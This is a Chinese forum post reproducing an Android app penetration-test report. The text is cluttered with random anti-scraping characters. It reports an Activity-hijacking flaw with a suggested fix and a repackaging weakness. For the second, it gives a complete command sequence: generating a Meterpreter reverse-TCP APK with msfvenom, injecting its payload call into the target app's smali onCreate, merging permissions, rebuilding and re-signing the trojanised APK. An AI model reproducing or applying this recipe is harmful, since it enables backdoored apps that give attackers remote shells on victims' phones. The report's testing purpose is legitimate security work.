原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

) W# i1 B* V/ ^, F+ {- [& x7 P7 }# o; y/ H5 X- U
. ^" W! P( s! |5 P1 T/ X/ @0 }5 t ) n* L# x- t$ w0 A

' [5 l6 k8 N* C" X ' b( D% ^" B( e 文档编号： ( s1 K& ~; g$ c, m0 h7 v+ m 1 O. N7 j# S- r7 M7 J7 }

7 B) X( l2 c5 f. f, q 6 s) R0 F; W- @, E2 Y# j( d ! c9 `+ ~1 A! F : h+ ], z4 a' ?* E* O1 o

- }: r& [: P# p9 c) R% f- D$ r+ Z- U1 T3 s 1 W' b: a0 b) K/ @/ T m( R; Q3 G% P4 ^; H4 k0 \1 A9 s

: Q! H1 n9 _0 }8 W7 f, R/ {; I9 ^+ A& A) S' J 9 s! L5 q% N$ X3 d % e" ^, f, N/ A& O' B; ?

% { P; O- o1 Z- r" U) w ( S$ T" M" T- n7 Y . t4 f. P, |" d2 n 2 s1 W p4 p+ i3 k+ X3 p

4 V7 [! z0 K: m0 i' [" Y3 Y# h! h I8 c" r- W. o ) A( K" L% y: `: e( ^3 {" D 5 @. b' e! s3 g4 m5 \+ _

) i: { n+ s, N% s8 L+ r 4 q) Y- t& I4 X# u& l5 q0 | 某某某APP渗透测试 - `$ p8 H& g8 V5 D8 a% y " {' I1 H2 z* N% Y7 _$ M

% j+ K! f* H R( k# M, P# h9 b& S : w2 J" D4 I2 M: v1 d 9 q1 t- `# B. o9 T: v . z7 O- N4 i9 x- q' Y# S) H

1 \$ d( t" {4 w$ \# V6 t/ f- v 4 _, @* |7 K# \ r; ~5 p4 Z, Y1 f # i9 I+ [8 P4 @# _8 e % z/ g9 j) f$ ~; J& G

. w, T- Y h5 ]) ~6 \ 1 q; f2 ]3 P/ V. O0 s ( x' k6 d! D3 h , f' `$ I j v9 b4 H& z& H. M/ c( L* T

. W X+ o. a) l7 q y0 C: H8 u$ V6 v( N' |! p3 q4 w7 C3 x$ [4 I % V/ I# g7 A8 ^" N; l ( _5 R: ?1 r/ {1 k) F6 a

) ^0 h# K6 e1 a7 u 0 D: m4 c& a, @ |3 R9 B3 ^ 技术报告 7 J/ `! _5 ~1 k4 m+ [0 {" c ! U$ M6 e8 b# l

* h9 A+ y# f W4 j& e, B+ S) c ) y3 o0 G* m! i( A) K & P, o2 J2 w; f9 s " u7 ?7 i6 H, } Z

/ j0 R+ o$ d9 J* j( B / b t' h. p4 a" H8 M! n. x ! [1 D9 b$ ^6 _" h0 C4 i! V/ z; I 7 V1 o- o9 c( t% e$ m/ Y

( u! z* y9 J' S% g% ?; ]: d3 M7 ^1 L# `% v - ?9 b# ~& ?# q0 ^6 u9 N% N' |) L* e3 v/ G" S% ], i

) p+ P6 v9 B5 Z : b6 |9 K+ ^; k! E/ u $ A% s# l4 | J3 ^1 v2 S/ N # F) l' {* a' c3 C+ X) `9 Y$ c- c

0 R; R3 V; `8 x4 h. x* j$ T$ x' p" {9 P1 t8 C( m! v2 T1 F4 a * Y5 ]1 \9 Y) ?7 J2 X $ X$ J" e4 u+ c

2 `9 ~8 D$ z3 V; v + M. J7 j' Z% O" a3 h- o 3 \) z: ~; _- K7 i8 M) H, l* u- O) ` 9 A: o8 r- ~# t" @9 A4 W# q J

0 [( {+ R) l; z/ d. V1 M / X& ~/ Z+ v+ L! | % p: o5 |/ U3 Z2 z/ Z3 I/ n8 R7 m/ Q, Q

/ ^/ F8 v# p0 O2 T/ s2 R2 D2 O5 t. X8 B- ?' v q; O " y+ C R0 y* H& [ & E" t5 Z6 p; V5 @

6 {6 T4 w4 x" \# `4 C8 |' X' }. d" F! ~ 4 ^8 _. y* o7 [# E: p5 t+ b : J* `$ ^# p) a6 R( z# y$ { ) T% L5 q4 d2 m+ P+ ]

* S% N6 Q% _, P# m$ K7 m1 i1 a3 m7 k2 T% w% L6 @( f4 Z ( J; h- h2 s8 {! e + ]2 ]+ g* b% i9 x- a6 D

. ^1 \+ B0 D7 p. w* }) F a5 s: n# F: }9 P Y$ E! b& s; G ( i( o1 N) a7 P. {0 G5 L9 g0 |/ Q# h2 x+ e3 z# n# Y

( D7 D6 m3 j# V z# H$ Y , y* C, B( B4 ^6 G - f+ A) r' X2 G7 E, m; ] $ W! D/ b: p+ O% ]1 ^

+ t' [; N {: X+ n8 W % v: S. r. S8 I+ h! h / ?+ ~' I: C5 N5 o* R+ B9 q 2 M1 ^) j) A$ \0 o" l

3 W0 s9 Y9 \" t' G* h9 e) }$ A+ } * K( C# R5 ?" ~ d0 Z( F/ f! f8 L2 G4 g

3 \1 Q: G' \. U " _( H' S: l" i7 T " r+ v; d* ?% h 7 J2 x6 a( A8 V8 i0 F5 w# _" q

3 w m/ v" j" b9 x6 S% [1 m % R6 `9 Q% ?8 D& c* x & J6 |" S a; }+ C$ K. { # y) M0 }6 B$ _* Y

+ ]" @% \. w! t2 p: D: M0 K , P; N* D9 ]: H# k' D 4 m# w" X0 |4 h- C4 R' m! ]( s . C+ \0 @) V* o. i% O3 p2 r3 S

4 B+ {9 N) r' W; b' z( T 2 X9 v2 e/ y8 L . [ x7 `0 G$ l/ f' W! R$ I0 L% ]7 A' J1 X* |+ w7 r9 _' R

* n0 P- Z4 b' ~: V/ R; E" R 3 k& N+ A, A. v. K% e# w/ P 二〇二〇年 % l1 R& m; J$ a: w# g2 ?% B1 v # |; s4 j( M5 d) s( v+ k K7 F

1 `# c. F" X! q9 U2 J6 P' U, \% ?6 _; p& t 目录 5 [5 n7 G5 v% p9 y3 [+ S4 H & U5 {8 l2 f0 }& ]$ [

2 M, @5 K6 `5 O. ?3 Z * e% H5 q5 _& Z0 }- C5 v( g 4 N! g9 U# R6 c+ p8 ~: x" b2 K$ q. B* u% Z

& f7 R, P8 {' D/ ^. Y2 z$ C & o6 ^ \5 j9 {5 U# B 1 概述... 3 ) x4 y5 C! j6 y5 Q! n 9 I" `' T( \1 e/ e

3 ~0 a( G9 ?5 q7 \4 d# J. c6 i+ w1 W4 ^, Q$ w* } 1.2测试时间... 3 2 N, m3 q; J- v 8 l X) x7 r' w0 b- B; A# ~8 m6 L

& c) ^. l ~' i/ { 6 }2 x6 w5 v' f# a 1.3测试对象... 3 & s3 W! }8 j8 q3 Y; [ ( M% F. s' d; @/ z# S. d

1 G8 z: g# I/ Y) c V3 C6 P- e9 z0 u : ~* R- g3 o R2 Q( y$ q 1.4测试结果... 3 4 i) z( x# K. ^ d 5 K' o% Y8 Z/ Z9 e0 u! U8 P

2 {; Y) t/ |4 \, a) q " ~* w; k! h, C! G1 b! M: p; f" Q 2 检测结果... 4 $ |& {# @) O; w ) E" f0 O3 T2 w$ F0 [. [

8 x0 s8 B, D: C& M" x" o- L2 X& H! v7 x: W g- ? 2.1 某某某... 4 0 K: N, D7 d6 m" A: C + E$ ]8 j+ F2 o! V; v9 Z1 Q

2 a! K2 J) Y4 `' _. U2 [8 i7 m ( X* w+ U3 w2 b 2.1.1检测目标... 4 : ^+ H5 c" j4 p- A; u; S+ m ; o/ O! f" e; ?' D+ E) p

2 X1 n8 L) g: f" E 9 q* E- E; h/ G( ^7 i: O& i 2.1.2检测结果... 4 3 `/ c7 A: Y* u( X, x9 U 8 c5 G6 g! Z o! b7 G1 M4 X3 P0 @* }. n

; l3 l4 S+ L2 P- y 7 z" \( ]5 y* n d# z4 L) { 2.1.2.1. 4 * ?0 h! _3 z! y2 M' Q9 s, @, E- o6 V9 o* e4 {% H, X9 r) l5 o& Y. {

9 u, a# W8 t \8 p* S& o: v1 [7 l0 T+ _( I 2.1.2.2. 6 3 h. @, k% K. S# u) x9 J' _2 N1 Y, F6 w* u9 x! {7 E0 f# e

4 L& s9 K1 ?1 U6 H0 o0 P k" l) D" @- f. t 4 b, [* T8 O& d* @- I; Z" q ^ A/ Y' y) d8 b$ s$ S

2 I6 ~# @* z) I N. y$ Y8 n3 ~) |% M6 x 1 概述 / H$ X3 ~% R$ G- J 1 d5 J0 ~3 T' |( @+ ^, r) W) c

5 r. c% y( X& ~; H, Y5 ?7 d: [6 k% h' {& C _( ]5 _# @) F/ j) [% s! ^ 1.2测试时间 1 g% U( }# y* e! C % I6 Q9 ~: m0 s

. E0 _* G2 r( a' l S ]" {& C _ @ 3 D3 b) B7 [. j3 z2 C0 ^( Y/ R* c7 Q% Y) r& Z4 h 渗透测试时间 1 ?" U0 f& e: m 8 n& R4 ^4 ~# m0 P 2 a+ y! n9 ~) i; S: c; ^ ' M7 l; @, h6 s6 B
2 F% u7 h3 n' q, B2 m ' k% U7 z! L( n! _. H% t ) z1 Y, Z5 k5 v ^$ W: r ( ?& J U' j* `# O; s: T. Q0 W R 起始时间 # n4 Y9 _7 n' x 7 ~6 T! c& v' x) z6 [ 8 F3 b: j2 g! L0 h " ^* ~) Z8 s% [4 H& }	# Y# i- y- z' h, z, h! M( }3 }2 _' q ; e7 V4 D( G0 ]4 s" ? ; s8 N9 Y3 Q: d! T B5 x$ A+ X% Y' {0 p" a8 p 2020年4月6日 6 q) v* R: \0 X 5 v! C+ W. A/ o3 J8 b7 i - [5 a# V! \|) Y3 d 3 B7 M! p& ^/ M/ b+ N U! P
, d. {) L# H. j9 N1 v7 d7 Z+ E _ $ N/ \/ G6 Q* y5 h+ J I $ H0 {6 t0 u% ?3 f3 ?2 e : h6 q1 h( \| o1 j( ] 结束时间 & @5 i _3 R' e% m$ B5 ?# y 7 ]) s0 J- z$ S2 t, k8 E 0 E- L& b, P j2 \& ^ 7 A3 i6 l% O; n% A1 s% `	/ q4 f- }5 Q- k 5 O2 T" K+ u( r3 @1 L* p 4 J% F9 T$ N. {3 T $ D4 z7 r! j3 ?2 `' @2 q: m 2020年4月9日 ) l% L4 w* L6 w3 o1 o. A8 I * P5 [, ^' n$ s; G; l. f6 ]1 p * c: p, i! I+ n5 j2 N/ f + k4 u. p% P: W

* V0 j P9 t# I, F- U2 v/ E: w7 ^( v7 r7 t9 t: M; [0 h( I; E 1.3测试对象 % S- F7 v0 l9 v9 S4 v ! Z8 j3 z% F8 M7 W% i

5 A4 j n4 W$ I- U7 X0 h0 Y9 o, i3 x- E. V1 y% W" W( k; F8 E# z& J 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： , h8 \7 L; Y9 u 7 Q$ F8 h L* [. w$ u

4 I- U8 Y( u! m) M5 P 0 `& v: A: l' B8 n6 J5 N 表1-1 检测对象 # B) R2 q% O- h5 f9 O' D/ |" i . }6 k9 z/ G+ e/ U

# _4 h9 j5 b- h- @; l" M' k ' w( f# ]2 }% c7 W0 M! f! M 5 a: x8 v" ?1 T6 }( V- \|$ J1 o/ c S! l, W 序号 6 x* m$ a% e( }1 ]1 B& }3 d" y) C " V- q7 K* C% d6 O# t, V) m 9 R7 }7 S6 l% r: I- F ' K( a/ `+ Q. I O	0 c. [- I5 p X7 z/ \|& A! X2 l5 C 7 a [) E2 p( N- N" m ! ] s* M- S' J M' L 测试对象 1 S5 `4 m d( p% P ' h* \$ ^' ?+ d" v 0 L/ f! a8 m3 L. T/ ]6 S * h5 j* d9 I8 j9 q8 m1 r' Z7 V	4 a, \|, C+ N$ v; z- j ' a. u8 f3 R7 _/ ~0 r3 M $ b3 Y) J3 K+ ?0 ?/ \; s 8 h4 I4 i9 E2 Z$ @0 a 测试地址 # k$ ~* k. ]/ \8 n 0 S* p) M( t7 K $ [+ T: T/ s4 ]+ ]0 a3 m/ R Z J/ [7 x+ ~/ N) C	% P& a/ `$ f4 k 9 b1 w1 q% ?- M" q$ G 4 C+ f) v/ i, e $ x. I/ ]6 _+ G% w 安全漏洞 & m; W# z( R6 t1 t 9 J" K& \|/ M8 x) \ 5 y, }2 {# S) T 6 X4 N! I9 v/ r, a6 C3 e$ G/ X
% m+ S* f7 @" Q# a L " d {8 ^) @7 c( o$ w8 f 3 [' M, S% R9 m" Z " e2 r" v! }) z 1 2 B+ T. _4 D! y / R1 a1 O, D! S% s" g8 w G( u3 h0 o9 w ; c- [9 Z* g% p2 ~( {# B! ? 5 x P4 I. i. s, b% R	0 P7 y( Y/ [0 e5 f! z: D D$ l0 O; v* `: D 3 T7 ~$ i Z' h z 3 f7 Y: B0 ]7 \' x 某某某安卓APP ! E: ?. C6 v, H/ `( M( C: v9 y+ W1 ^, t" D6 _ / U8 O' G2 n2 V! x/ ^7 H% \|4 v2 R! E+ i, o. L0 v4 j	8 ?, y+ I- \$ f# l; l B" q1 Q: }" I( ^ " V+ w* d$ U) }/ e9 F- B " I8 x0 ^4 A4 \|6 M9 f! E7 S/ d6 P9 w4 ] , _0 c. y% w7 ?' o- M2 H: t+ X9 Y6 R# K3 R 3 b: t3 R9 K! R! g$ C; p) n 9 J- `; v1 r S1 u# n) L4 m	3 e3 Y) p: y, k. Q& f " z% C; h) H7 q; Y4 D) b / X+ g4 W, ?1 w6 C5 j% X' R$ s / Q ~! _$ Y1 O# s1 ^! A9 i2 r 2 , l( c" [; T6 ~1 z, u* ]0 _ 5 l( ]" x1 `3 T2 A2 S3 L , [" ?! J7 P- u& B0 P ) y, O- o% p- r* c. L% W, K

. ^9 \7 }6 R) Y1 f; O3 N4 n 9 d, S, i% F6 |7 v- Z 1.4测试结果 7 u" l' v3 w0 ~0 `3 }* E * l6 _7 B4 w0 Y1 F! v% y) c

1 _5 T( |) U4 J& @; M " ^. W) h+ |' V* W$ H8 y/ n8 x2 V% b 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： ) s0 d9 F0 f8 B2 R3 ]4 {, T , G" X' s* B; O/ }/ N

# P7 R7 x$ M* S I * O( d7 V( ?( ^! | & g, C) \# x" v5 y5 k0 I* }6 q9 i1 g F2 c; ^% t6 a

: l; ]; L+ B0 f6 q) K3 L6 ~ ) J' \4 [( v$ N+ R- H 序号 + m0 o( e, f3 l: `4 {1 a! o1 u- P6 b, \ ( n$ m5 i) H# D- d1 r

" f( O! D+ Y" v, j0 t6 x- S! n - v! g% O" n- ~6 }1 j; _/ \3 m7 b4 f 系统名称 " y* X) d+ C; T, s9 H7 I Y0 y 8 D8 V4 j6 D" z0 p! y" q5 O

/ f3 O+ @, |8 L 9 |$ ~: o$ [9 @3 A: d4 ~ 漏洞名称 9 {" W- A5 ~7 z# M : q& c$ L0 u. E5 p6 k3 } h u( o

* W' @, P, a/ g, `) Z( m" K2 H. f; U' Z 漏洞危害 8 k& @) r# q+ b# P 4 `* }: c- b. P$ @9 i+ r

+ @/ @# h9 Y7 I5 G $ u0 A* {1 M4 ~& @1 }) \8 { 修复结果 & g A8 y# n% w0 m. D6 \9 A ( m% K0 S. v5 R/ |4 M

- _/ h; L; W3 y; O7 J. ] ; o8 T- y. K9 k% ]/ V3 L0 l 1 & p$ E/ F" @( Q5 Y , C7 f2 Q$ L( P+ C5 _" |; o& ~

% {7 ^, T `' \( ]5 O7 G& ] 4 d4 s: {8 T/ P3 J1 M 某某某某某某APP , ?5 ]( f. B# p$ P/ K( n ! A& O. R5 V! y, u& x

9 e3 m- S% @4 [+ g : m0 V7 u+ m& I9 @: Z# A1 C$ m" y Activity 劫持 % x0 L0 Y- }. B. L9 i; i ' O6 E6 ~4 \% o4 W$ F

. N& i/ U; W* K2 l( s L5 L G) @# D$ t5 [5 }' C5 M $ Z" R/ z' J4 y; _) ]6 Y. ] - F' X' t$ Q( a7 c9 V/ K

" w+ q U0 G l, f+ ~1 G4 p) n( o" m" e8 }2 R 高 ( ?4 l1 Y, q, ]" a2 F4 | 7 o9 _5 ?. t1 a& Z4 o6 B/ E3 ~3 v3 U

: L; T5 ^2 j$ y ( F; }! `. n8 Y# l# A0 @ 2 Z: ^. j2 v R1 A8 C+ H- p ' ]+ V8 t" X4 P/ T

2 v( v4 ?7 c) y" P8 B6 C9 Q # k8 K5 A7 e1 ~' } 2 ( }. _- M5 j. X, C! c * W5 Q0 Q% s: M$ t, a, k! E6 Q

( `- a6 H" w- q, `* F- q9 { , P g6 T- h, {: t0 `4 K! {, [& l! z" ? 某某某某某某APP 0 d2 W1 z* e4 D9 s! R4 ]! R 0 B7 M8 I) p* b, p% D, j) E

" r' F2 v0 m9 a5 k+ K7 N! R ( N+ [/ N$ `5 L0 ^& _0 B 反编译二次打包捆绑木马、篡改APP代码 $ e3 K* o n% X9 s) f( i3 T9 D) u( S+ o( n6 z

# X* b5 j. S1 y/ B1 K , ~: V2 z: b: I 高 0 r' T) D) `- N4 ?6 T8 m8 x2 b, X, `& z

9 j1 }7 s! t8 v, P' G+ X " {% i) x; `# t/ F& @' }! u R2 n" b* c) E6 b$ l) e% C: j, k 8 }7 ^ ^1 i" g) x+ a4 m

6 u o# n0 [% C8 Q ( q2 t% K# p. A1 u 3 Z4 x) C" l. a% N' a8 q; X & x" h, V6 j1 A X, H% H0 G0 [

+ w, N. B% r$ _: P & O4 @ q) q$ k& M 表1-2 测试结果 ! c" T: c/ t, h! D$ H- c+ K 0 }1 }# u4 q2 v+ i0 e9 G

: g5 x! y) O# |: T # }. H# h$ |( F+ h1 c! j' f) k $ U& U2 H& ?& d0 ]0 b d 0 L3 J5 z8 a7 T2 f2 I' ]& V" F* n

! R9 ]% C3 Q! l6 E 5 @( @1 ?: X) S" I% ^$ ` 2 检测结果 * c1 H7 | G* V { D4 N 8 b+ M8 }. Z L" T5 l8 @

( y' W+ }6 S+ ^, d: ^' n5 A5 [1 n6 K- H& W9 m N 2.1 某某某 4 `/ \3 D6 x/ N6 ]3 w J) n, ^& Y+ V% h; f5 Y; @2 a, m1 A

; j' a( e% S: ~/ f8 L: m2 w+ }9 C( k 2.1.1检测目标 0 [% m( a* J- Y! b. k/ v! t + O, E) b# E y4 i4 s' K- w

x6 H2 R' c8 d" t5 Q! x4 F : r) K4 R7 r0 ^ 目标地址： 某某某某某某APP 7 K6 i4 u/ A- C. c0 p ' S" q) G7 ^9 C5 i( d

: }; g: i4 V1 U+ o6 B$ a. d, @0 u( Z; h 2.1.2检测结果 9 |+ {. e0 v$ y: h" Y/ ^( g% ~+ K1 Y, `6 |9 V

( y' [* f. Z9 V# u& s% A; D / S5 ^ H6 Y6 B 2.1.2.1 1 _( k6 ]4 \7 ` ! l; g0 [ q0 Z9 ~) R2 f

) \+ p/ N* Q" V1 @$ i1 x1 s0 E8 q4 U, g% B1 Y. } 漏洞链接地址：某某某某某某APP ' H9 ?3 L3 E7 h R, q& @! C . t: q! z. ~0 F6 {6 [1 `$ y$ b

0 C: `, s! w) j) j7 t2 s8 @8 d7 m8 u 2 }1 W1 Y7 \/ k! d . o" n$ ?! r7 Q7 t, B

' D; {. d0 e9 o0 ?0 X, e& a " r! o: H, T. ^5 e 漏洞分析及取证： 5 h, b$ c3 _5 ` 2 g% F3 s4 n, R. V

2 l2 A; l, Q' N$ Q- W) Q1 D. k5 m) t1 K1 N 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： X+ }' \% ?6 A; [5 _- Z : D7 _! i* s; o" D' v1 T9 h- i; O5 ]2 G

" I* J1 S9 @% j: A* ]1 r6 M+ E& a+ S ?% ?) r" N- f+ r4 ~ ' m4 D8 e% L. }& {; g' X. B0 p ?7 d' M4 l

, ?- |# r/ b% n' i2 a: j : P E+ c# E& j3 c5 D M6 I8 T 7 k8 E- Q- g. _9 }. w . |0 D4 b- v% x" }1 ^& K

- \* U% I8 z+ h* O! l, h Z1 F2 m 8 b M. @ P4 d' w - z C! a$ {4 x. o5 }1 L# Z( s " ^5 s6 Z- G, f) \: j! `8 k

+ U: I1 ~) n- W4 { ' V' ^( { z. G ; ?3 Z- Y6 w- r( [- N% k- f% `4 G; D" L : g# y. K: d# }' j& x. {/ v

& Z% _5 t: D, ?9 {5 T; F' L . i! G1 d! c: K/ s ( y0 Z: T; i" q- j* Z 9 D& k: t! O# ~- T- L* [3 N9 v0 _

* M1 m6 l ?- k( ]' P3 T' |9 F 3 a; u& G4 Z' o- J: p6 \' _ 漏洞危害：高 $ X- S8 z. _0 |+ Z 1 _) U% ?9 e2 x1 v5 }# p0 Z" N

1 u# M& R' k' `! l) Q 1 a6 M4 N$ F% d. }# ] - ^8 Y. a' S* k, s$ ^0 @ & G$ _9 @/ A$ X 严重程度 + E( D+ v- a& o" Q+ S. ]0 R8 e* k) z $ u w; Y- r# X4 B( s ) F4 J1 l8 x7 ~, a- Q4 j8 k. Z- A * z8 N! @2 g- L* V5 h	4 S- o# k/ y/ ]1 q2 X9 g 7 K3 Z! p2 `% \5 V C3 E- ^% M ; K: V, ?$ y$ P / k0 }: b% P& k4 h# k( ~7 \# Z 高 8 d r' v+ o+ o7 h+ J! j, V2 O* b * q' y; q ?5 u, J+ ]7 o) q * p' E3 c7 f, Z b 0 h d# Z! K5 f: Q E	: B1 \# I# q1 f; E( S& X V: Y* `. h! @3 V- U( [. O . G) ~5 D; B f # A3 Z3 T0 \) ^: R+ t. A; \ ■ : U3 J4 Q) k- ?9 [ 7 c b& S5 J2 N V5 T & b A: g% g3 `0 p1 T# N1 C ' i4 c! B* e, y. \$ q" r$ g	2 O' a( B" A* ~ $ \|( Q6 H/ G. X- t" _& \: F. {; n ! \|9 @- [* g4 K, b# ~7 `+ {# u' H" C5 q( F! w8 M 中 8 p1 l8 p+ B: U4 L) A! T& n j \| 0 X* s& [; u% ~0 q' ] F 1 ^- r2 A2 X, m$ U	" T0 Y) t8 m& q) d1 W# c( D 0 m/ Y7 J7 C4 a# H: b ! M$ {- n( [* n7 G% u6 w6 G; T* a. u9 d: ^% C 2 ?2 A4 y. [, v4 Y. F( y6 Q5 r" p ' H$ w8 \* \& w1 L. H& h, l 9 N2 z( E9 y, O+ P( z; F7 x6 V0 S' C. G. P- v2 @3 y6 [	; V1 {; T: a7 g2 B- p- @ + G1 ^0 J0 C1 a g5 i8 [6 r 2 h% x+ Y0 Z, I% w6 d; Y0 y ( ~( ]' N9 ^( P$ t% T 低 # \( D: K' f; k- p: g; G4 O + T+ J% H# Z3 m6 B8 C# M4 ]; N- j. N) e , \|, X- q( d: s1 C2 C1 o0 J5 C) \|3 B7 K1 Y9 o3 w! J	+ S1 F4 N x* }4 _0 ~( N1 y: A 4 A! ~! N; `! [- X3 y1 f # \|- p* ~* d T$ F0 T& K& x8 C , M5 ~4 m; t" y8 _9 h 0 N. q. N' c$ O * O( j' M6 T: M/ I3 f : \|8 g+ \|7 f/ ~& a# J3 _1 _; d* ]/ z1 d- `4 J* c+ ^( ^* p

7 c7 G" d9 I. I V* ?$ M/ | : x+ Q$ z- |& L& N3 W + E! y3 i6 z7 o5 K1 S& A5 m 0 Y* g4 Y1 Z, s

& E3 ^( U @1 Z% F& Z ! F2 z$ j* c1 s( ^ 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 & F" l D; r0 V; r$ }3 C- k1 Z/ J/ v3 @

5 H) F2 D/ n! K, t6 j ! v. {7 W3 b6 E) { ' g; T& \/ q& D+ Z; R( q ; d; T" x8 ^% r5 D2 J; X/ S

, {8 p) U/ ~; C9 H. R! G , y) V" n! N* W5 }8 C1 s2 n- E * A2 B1 Q, G, p& q * ^6 W1 F; U" ~

3 ^3 e- R$ _; v* k9 y: L 1 W; ? o8 V9 c4 b( g% w9 T 2.1.2.2 ( `% \+ ?) l0 u3 U |" h. o3 {$ R1 b( ^) s

# O. q3 c+ e% R T, n( L( F 0 O$ D1 ~& |# T8 Q6 Q4 \+ P 漏洞链接地址：某某某某某某APP 4 |. }. }2 c' K0 ] 7 i1 K7 X" T/ }* s1 Z

( u/ F' Y! @2 U* K6 V$ f/ }2 M 9 E! D- }' s- \" `/ Y j1 ]- F 漏洞分析及取证： ! C; o6 u7 f/ d! p+ Y & S1 X2 X) R! f+ h+ y9 c

8 B6 l$ V& c1 C * T6 k: e/ p; \- N$ ^ 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： # y; g) U9 H, @: Z8 I % O. s U3 P+ k8 ?( y

0 h6 J2 m V# W* z m' R" Q" e+ y9 U) z3 W; ]9 N& `: I4 N! N 用Metasploit 生成木马 apk 4 e- M, {0 M# q( R b G/ H3 z0 Z: H0 b' k

3 o$ F p! \% v + d/ O! z6 N( r msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 y N5 B/ P9 N2 g; b4 \0 \: k9 H9 z* `" X- _8 ~/ y

" y- C/ d" Q; r! b _$ ]7 k9 w& a. j7 q3 F( \ 反编译目标apk和木马apk ' N: X4 b; J! N& ^( w8 x: e / X$ l+ `2 i( {. M4 Y

5 \6 K* \& |9 j! L, { 1 E0 g, D# r9 N5 q4 ?( C+ w apktool d target.apk
8 b o3 j3 F6 i- i0 S( @! j6 ]9 q* w4 U apktool d cockhorse.apk 4 s7 w V# \2 {. @' K ( K) c" A8 y# V% W

9 b7 _# [0 h+ A 6 J- [6 \& T% J5 p 木马 apk 注入目标 apk 5 m1 S6 d7 V2 D" j) e0 w( I 5 K; k* v8 t ~7 y

7 }5 R: r9 N8 C5 T# x9 u7 F' @. [4 G- C- f; W, e 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
9 e u i( h: Y' o' y. o4 ?; K " e/ X( { V- c" s" |5 [ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V . P% s; z. I; i8 b( X z3 m1 X0 E- ]: R8 T; j

. b: m# P: {3 C D( b h0 r 6 `5 r8 T. f1 q- S- ` 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 % F3 I6 W/ u4 @, l6 G* D7 e5 [2 h' }/ X

( @, P/ x5 D8 H 2 d+ g( [& ]% t9 e2 c4 o 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 E. {: R$ |/ u9 o; X' i% X # a, V/ i" d( H8 ?2 x3 M

4 U* s" w" X& \2 q3 f3 w1 J% n 8 W; M6 a. a2 r; X& W4 f* J. L 回编译生成最终 apk & Q4 v2 ^8 r% H 4 L. @) r3 Y& B' d) l m+ _

E+ j% u6 {. ~# @4 J, j" ~" ~ ]2 Y2 ~. _5 z/ R" J8 M 重新打包 # o9 [0 [: D% `6 g1 u' J 1 j w7 Y7 h4 g) W) V2 M

v- v/ @5 Y9 D, D) | 7 X5 C0 C+ |0 @9 _ apktool b -o repackage.apk target_app_floder I) [3 y6 ^* |1 X4 C; J) R$ f% l 6 G* E6 ^$ j' h, u

" ^$ D& z! V4 T3 J# K3 S2 j/ w ( m* V3 F* r( m j; g- z3 d8 p+ ~4 G$ X 创建签名文件，有的话可忽略此步骤 1 P9 L, ?8 J2 W% ` g. E6 W% z3 a" M0 C- T" a) Y

* F5 g; N- ?8 @- x' q* Q + Z% a6 G N- W7 M keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ' ^: l; ?3 O, t5 Q; @ : ?7 x, w" y6 ~. V# g0 L

2 n! s/ v* w7 ]8 e- U/ _0 `0 C 0 R4 ?% L/ ?9 V, l6 f- c4 _# l% l 签名，以下任选其一 " o1 k/ j) r( {( Y1 G 3 B- C0 P# T! J: S) d

d- w* F* S5 v 8 `$ `, _4 U1 k jarsigner 方式 1 w8 u2 R: }, h3 q2 E# d! h3 r8 r 9 v! S( ^) `( G# L. S) F' k7 d

/ D7 U# |2 S* p5 d 3 u; P8 g$ J# B$ }, I jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname $ `0 B; v1 `. g % t$ P [2 O. o- s, y2 _

- M2 e( n1 o6 g( \! F/ e . B3 Q( Y! k" {1 s1 f apksigner 方式 4 t3 d1 V- h5 I& ^3 h4 C 8 D. Z( c2 X, K7 Z! s. [

8 I/ A1 p8 f. i* F 6 B- I. J" n: @" {, N2 U0 E apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 A( \- @, {6 m1 L2 K " a: e* k% P5 {8 j, Y3 X

2 d z. P# s% ]7 s' j% h' {: z% Z- }6 \$ L; b 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 ~: w& |: f5 ^0 A - n" K7 f! y/ m

: ^. n/ l7 X t& ^; R" E6 n) g0 D3 O5 l7 _2 o! w& Q2 R O% i; p# P 验证，以下任选其一 2 \0 R6 L6 y8 @7 D* n * ]( a0 P: r/ R! O

3 O/ b f9 S, i$ ~2 B' ]0 o/ F $ Y1 }6 m) R, A" _ jarsigner方式 7 D5 Y: x6 N% W% G2 B: s8 ~ ; {& R/ R' t# { j$ F$ a

0 b9 ?0 I9 V; [ 8 H. U, Q* q* q. ]) s jarsigner -verify repackaged.apk 6 Y$ {* c% P- ]! n* o, N( V% v. w, I* t, m, D, N

% e' w* g! a# p- p9 y0 f e + k* L- Q6 L$ @ apksigner 方式 . V1 ^! r! i& x1 j6 Q0 D- b% | P8 n' W! U, E8 L" X% t

% M8 ?) t' g0 L 2 s+ i' ^8 y& Q, b apksigner verify -v --print-certs repackaged.apk ! o/ m1 r1 ^' V2 C3 R# l % {& t3 j* f. V+ X# e

+ i, o& C* n4 A/ P: F( `- d2 j( e 1 q) h* O4 u1 H' E# q3 S( N- N! w keytool方式 $ |1 x8 Z8 W) P) f& |" @; k& b2 ^0 }" H% o% W( P8 \( l4 w( I

